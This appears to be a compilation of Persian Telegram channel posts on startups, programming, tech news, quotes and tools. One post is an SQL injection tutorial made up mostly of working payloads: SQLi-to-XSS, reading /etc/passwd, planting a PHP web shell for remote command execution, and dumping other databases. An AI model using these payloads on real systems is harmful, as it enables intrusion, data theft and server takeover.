US innovates, China replicates, EU regulates.

— ضرب‌المثل

#note #quote
@amiria703_channel

هوشیار، دستیار تغذیه و سلامتی شما آماده‌ی استفاده است!
GetHooshyar.ir
🌱 با افتخار، اولین نسخه از هوشیار، دستیار سلامتی هوشمندمون، آنلاین شده و آماده‌ی استفاده است! هدف هوشیار اینه که تو مسیر سلامتی و زندگی سالم‌تر بهتون کمک کنه، از پیشنهادات غذایی گرفته تا راهکارهای ساده برای بهبود عادات روزمره. خوشحال می‌شیم اگر تجربه‌تون رو با ما به اشتراک بگذارید.
از امروز می‌تونید هوشیار رو امتحان کنید و اولین قدم رو به سوی سلامتی هوشمند بردارید! 🚀🌱

برای استفاده از هوشیار کلیک کنید 👇
GetHooshyar.ir

فیبدک یا ارتباط با تیم هوشیار: @talegh
کانال تلگرام هوشیار @getHooshyar

این ربات برای کمک به توجه بیشتر به بحث تغذیه و سلامتی توسط من و دوستانم ساخته شده.
ممنون میشم اگر استفاده کنید و اگر نظری داشتید بگید.
اگر به دوستان یا آشنایان هم معرفی کنید که خیلی عالی میشه.

خلاصه برداشتی از جلسه ADPList برگزار شده در علی بابا داشتم

وقتی استارتاپ شروع می‌کنید، دیگه شما فقط کامپیوتری نیستین

شما باید اقتصاد بدونید، بازاریابی بدونید، از خلاقیت و نوآوری بدونید، حل مسئله بدونید، رهبری بدونید، کاغذ بازی با سامانه های ایران رو بدونید، حتی باید حرف زدن و قانع کردن هم بدونید ؛؛؛؛ برنامه سازی و پیاده سازیش فقط یه بخش کوچیکیشه.


باید همشو حداقلی بدونید و حواستون باشه اگه تو یکیش خفن اید مثلا می‌تونین حرفه ای کد بزنین به احتمال زیاد وقت نداشتین که بقیه موارد رو یاد بگیرین و این یعنی شانستون برای موفقیت برعکس چیزی که فکر می‌کنید کمتره :)


🐧 @Linuxor

🔶 فاطمه مهاجرانی، سخنگوی دولت، با انتشار پستی در ایکس نوشت که «درمورد نرخ تعرفه واردات اشتباهی رخ داده که به‌زودی اصلاح و به اطلاع شهروندان محترم خواهد رسید.» برهمین اساس، به‌نظر می‌رسد که دولت پس‌از مشاهده‌ی موج واکنش منفی، از تعرفه‌ی ۹۶ درصدی واردات آیفون، عقب‌نشینی کرده است.

#خبر

@TheRaymondDev

این پست جنبه اموزشی ندارد 😁

از وقتی برلین اومدم خیلی networking event میرم. در در حد هر یکی دو هفته یک بار. دوره همی فانه، کلی ادم و دوست جدید پیدا میکنم معمولا بعدش هم میریم بیرون. نکته ای که خیلی برام جالبه اینه که همه دارن یک کمپانی AI میسازن تو این event ها، و دنبال فاند raise کردن هستن که پروداکتشون رو لانچ کنند. این AI خیلی بیش از حد ترند شده مخصوصا تو VC و fundraising. اصلا انگار مردم یادشون رفته تا سال پیش هم AI وجود داشته 😅

یک استارت آپ داشت pitch انجام میداد، کارشون این بود که بگن از چه پروداکت skin care چک کن با استفاده از دوربین گوشیت. همون کاری که بری یک لوازم ارایش فروشی اون فروشنده تو ۲ دقیقه انجام میده. و این پروسه ای هست که نیاز به human interaction داره.

و چیزی که خیلیا دیدم فراموش میکنن بیزنس مدل و استراتژی فروش هست. اوکی پروداکتت خیلی باحاله ولی چرا یک e-commerce باید ده هزار یورو خرج همچین فیچری کنه؟ اصلا چه سود مالی داره همچین چیزی؟

بنظره من این عنصر پروداکت که بتونی قانع کنی کلاینتو و بتونی یک چیزی راه بندازی تو خیلی از این پروداکت های جدید AI وجود نداره و میخوان با چکش AI هرجوری شده هر میخی رو بکوبن تو دیوار.

@PyBackendHub

تبریییک 1K شدنمون مبارک 🎉

جا داره از این افراد و چنل های زیر که مارو خالصانه پروموت کردن هم تشکر کنم واقعا اگر پروموت های شما نبود به این نقطه هیچ وقت نمیرسیدیم.

+ حمید دانشگری (توییتر)
+ محمد عابدینی (lpicFarsi) و جادی
+ بهراد و هنتای کدر
+ حسین سیلانی ( توسعه دهنده Emperor-OS و Predator-OS)
+ سید مهدی Diary
+ چنل های La3tKnight و Foss Station
+ کاظمی (دبیر انجمن علمی دانشگاه محقق اردبیلی)
+ و جمعی از بچه های دانشگاه زنجان

و کلی از دوستان و چنل های دیگه که توی آمار هایی که تلگرام بهم نشون میده نبودن و باعث شدن ما بیشتر دیده بشیم.❤️

🐧 @Linuxor ~ Sepehr Soheili

Typescript >>> Python's Typing (type checking libs, intellisense libs..)

توی عکس بالا، لاین ۳ درصورتی اجرا میشه که data استرینگ باشه و خب ما متد strip واسه آبجکت استرینگ داریم پس نباید مشکلی وجود داشته باشه. ولی mypy میگه از اونجا که dataی تو میتونه یا استرینگ یا اینت باشه، متد strip واسه دوتای این تایپا وجود ندارن! یعنی انگار mypy اصلا if statement منو نادیده گرفته. همین اتفاق واسه else هم افتاده. طبعا اگه تایپ dataی من استرینگ نبود، قطعا int یا یه چیز دیگه هست. ینی int | Any (که از اونجا که تابع من یا int میگیره یا str، باید بیخیال Any شه) و در بدنه else با data جوری تا کنه که انگار intه ولی هنوز (حتی بعد از if اول که) داره با طرز تفکر str | int چک می‌کنه که این جالب نیس!

و حالا اینو بهتون بگم، typescript هیچ کدوم از این مشکلا رو نداره که هیچ، به شکل وحشتناکی هوشمنده! یعنی فرض کن یه فانکش داری ۱۰۰ خط، یه متغیر رو همه بلا سرش آوردی.. الان لاین ۱۲۰ هستی. اینتلی‌سنسش می‌دونه الان امکان داره متغیرت ها در چه وضعی باشن.. تمام حالات رو (طبق کدی که نوشتی) بهت نشون میده!

یک مثال اینتلی‌سنسی هم در این توییت نشون دادم. (از پای‌لنس استفاده می‌کنم)

🔵 عنوان مقاله
Giu 0.9: A Dear ImGui-Based Cross Platform GUI Framework

🟢 خلاصه مقاله:
مقاله‌ای که مورد بررسی قرار گرفته است به توضیح و بررسی نحوه ساخت برنامه‌های کاربردی گرافیکی (GUI) با استفاده از زبان برنامه‌نویسی Go بر بستر کتابخانه Dear ImGui پرداخته است. نسخه 0.9 این فریمورک به عنوان نسخه‌ای که تغییرات عمده‌ای ندارد شناخته شده، اما قابلیت‌های فریمورک را تکمیل کرده و مستندات بیشتری به آن افزوده شده است. این افزایش مستندات به توسعه‌دهندگان کمک می‌کند تا با استفاده از این ابزار بهترین بهره‌برداری را داشته باشند و بتوانند برنامه‌های کاربردی GUI قدرتمند و کارآمدی را توسعه دهند.

🟣لینک مقاله:
https://golangweekly.com/link/160773/web

➖➖➖➖➖➖➖➖
👑 @gopher_academy

پشتیبانی مایکروسافت از ویندوز ۱۰، مهر ۱۴۰۴ تموم میشه و بعد این تاریخ ویندوز ۱۰ دیگه امن نیست، حالا تو خبر جدید گفته اگه میخواید آپدیت‌های امنیتی بعد این تاریخ برای ویندوز ۱۰ شما انجام بشه باید سالانه ۳۰ دلار پرداخت کنید.
در واقع کاربرها به خاطر پیش‌شرط داشتن ماژول TPM 2.0 نمیتونن از ویندوز ۱۰ به ویندوز ۱۱ آپدیت کنن.
این ماژول روی تمام دستگاه‌های جدیدی که چند سال اخیر تولید شدن وجود داره، اما اگه لپ‌تاپ یا سیستم قدیمی داشته باشید امکان آپدیت به ویندوز ۱۱ نیست.
از طرفی البته ماژول TPM 2.0 رو میشه به صورت جداگانه با قیمت ۲۰ دلار تهیه کرد و روی مادربورد نصب کرد که البته در ایران این ماژول خیلی کمیاب هست.
windows
@geekalerts

آسیب پذیری SQL injection =

از اونجایی که هرکسی با مقدمات این آسیب پذیری و اکسپلویتش به روش union رو بلده، خودِ آسیب پذیری رو توضیح نمیدیم و مستقیم میریم سراغ نکاتی که در این آسیب پذیری باید رعایت کنیم.

فرض کنین که با order by تعداد column های وب سایت رو به دست آوردیم و دستور union select ما به این شکله:

app.php?id=-1 union select 1,2,3,4,5,6,7,8,9--

1⃣ تبدیل SQLi به XSS:
بعد از مشاهده ی خروجی دستور union select میتونیم به جای عددهایی که تو خروجی به ما نشون داده میشه، پیلود XSS بزنیم. ولی باید پیلود رو به hex تبدیل کنیم و قبلش 0x رو قرار بدیم. برای مثال پیلود <img/src/onerror=alert(document.domain)> وقتی تبدیل به hex میشه خروجی 3c696d672f7372632f6f6e6572726f723d616c65727428646f63756d656e742e646f6d61696e293e رو داریم. در نهایت پیلود ما به شکل زیر تغییر میکنه با اضافه کردن 0x قبل از مقدار hex.

app.php?id=-1 union select 1,0x3c696d672f7372632f6f6e6572726f723d616c65727428646f63756d656e742e646f6d61696e293e,3,4,5,6,7,8,9--

و XSS اتفاق میفته.

2⃣ خوندن فایل های درون سرور:
با دستور load_file میتونیم در mysql فایل بخونیم.
نکته: برای کار با فایل ها باید privilege لازم رو در دیتابیس و سیستم عامل داشته باشیم.
برای خوندن فایل passwd با SQLi:

app.php?id=-1 union select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9--

3⃣ ساختن و نوشتن فایل درون سرور:
با دستور outfile میتونیم فایل بسازیم با محتوای دلخواه.

app.php?id=-1 union select 1,'hacked' into outfile '/tmp/hacked.txt',3,4,5,6,7,8,9--

نکته: میتونیم کد مخرب رو درون یه فایل php قرار بدیم و RCE بگیریم.

app.php?id=-1 union select 1,'<?php system($_GET['cmd']); ?>' into outfile '/var/www/html/shell.php',3,4,5,6,7,8,9--

واسه کار کردن این پیلود، همون طور که قبلا گفتیم باید دسترسی های لازم رو داشته باشیم. و همچنین باید فایل رو در مسیر وب سرور بسازیم که با مرورگر قابل دسترسی باشه و در آخر تنها باید فایل رو باز کنیم به شکل زیر:

shell.php?cmd=whoami

4⃣ دسترسی به سایر دیتابیس ها:
با استفاده از دستورات زیر داخل select میتونیم یوزر و نام دیتابیس جاری رو به دست بیاریم.

database()
@@database
Version()
@@version

ممکنه یوزر sql ما به دیتابیس های بیشتری دسترسی داشته باشه در صورتی که خیلی وقتا فقط اطلاعات دیتابیس جاری رو dump میگیریم و اصلا سراغ بقیه دیتابیس ها نمیریم.

به دست آوردن لیست همه ی دیتابیس ها:

app.php?id=-1 union select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--

بعد از انتخاب دیتابیس مدنظر، مراحل اکسپلویت رو به روش group_concat که در اکسپلویت های عادی هم استفاده میکنیم جلو میبریم با این تفاوت که به جای ()database در پیلود که به دیتابیس جاری اشاره میکند، اسم دیتابیسی که به دست آوردیم رو قرار میدیم.

#SQLi

The United States of America is such a glorious mess of contradiction, such a crazy quilt of competing themes, such a fecund mishmash of people and ideas, that defining us is pretty much pointless. There is, of course, a kind of faded notion of "Americana", one that concerns Route 66, diners, freak rock formations, and the like—but even in its halcyon days this "roadside attraction" version of America was never an accurate or nuanced distillation of our massively complicated culture.

— Hampton Sides, Americana: Dispatches from the New Frontier

#quote
@amiria703_channel

seashells.io

Seashells lets you pipe output from command-line programs to the web in real-time.

#FLOSS #tool #معرفی
@amiria703_channel

هر وقت نشونه‌هایی از وجود یه آدم رو می‌بینم، ذوق زده می‌شم.
این حسّ یه خورده عجیبه چون کلّ این زیرساخت رو آدم‌ها ساختن ولی آدمی توش دیده نمی‌شه.

#موقت

ماستادون یک ویژگی رو اضافه کرده که به تولید‌کنندگان محتوا اجازه میده تا حساب ماستادونشون رو در پیش‌نمایش لینک‌ها نشون بدن.

برای این کار کافیه تا وارد تنظیماتتون، پابلیک پروفایل بشید و لینک سایتایی که می‌خواید این ویژگی رو داشته باشن رو وارد کنید.

بعدش وارد وبسایتتون می‌شید و داخل فایل index.html یا اگر از SSG ها استفاده می‌کنید داخل مارک‌داونتون یک

<div>

</div>

باز کنید و این تگ html رو وارد کنید:

<meta name="fediverse:creator" content="@[email protected]">

صدالبته باید اینستنس خودتون رو بجای
@username@instance.com
بنویسید :)


@SohrabContents

وضعیت این روزها.....
➖➖➖➖➖➖➖➖
👑 @gopher_academy